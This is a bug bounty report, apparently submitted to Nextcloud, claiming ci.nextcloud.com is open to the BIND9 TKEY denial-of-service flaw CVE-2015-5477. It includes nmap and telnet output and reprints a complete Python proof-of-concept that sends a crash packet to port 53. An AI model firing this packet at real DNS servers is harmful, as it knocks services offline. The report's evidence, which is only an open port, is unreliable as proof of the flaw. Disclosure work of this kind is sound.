Nextcloud: ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)

Hello Team NextCloud,

In reference report #217381
I’ve reported the DDOS attack via DNS Port at OwnCloud…
And it was successfully patched.

But now same issue I got at

ci.nextcloud.com

Proof Of Concept:
Here it is the nmap result of ci.nextcloud.com

NMap Scan Results:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT
Nmap scan report for ci.nextcloud.com (█████)
Host is up (0.077s latency).
rDNS record for █████████: ███████
Not shown: 96 filtered ports
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
53/tcp  open  tcpwrapped
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped

Now here it is the telnet result:

──╼ $telnet
telnet> open
(to) ci.nextcloud.com 53
Trying ███...
Connected to ci.nextcloud.com.
Escape character is '^]'.

So this can leads to a serious DDOS attack at doc.owncloud.com using the exploit…

Exploit Link:

https://github.com/elceef/tkeypoc/

Vulnerability Reference CVE Details:

https://vulners.com/cve/CVE-2015-5477

Exploit PoC:

Exploit Title: PoC for BIND9 TKEY DoS

Exploit Author: elceef

Software Link: https://github.com/elceef/tkeypoc/

Version: ISC BIND 9

Tested on: multiple

CVE : CVE-2015-5477

!/usr/bin/env python

import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')

Thanks :)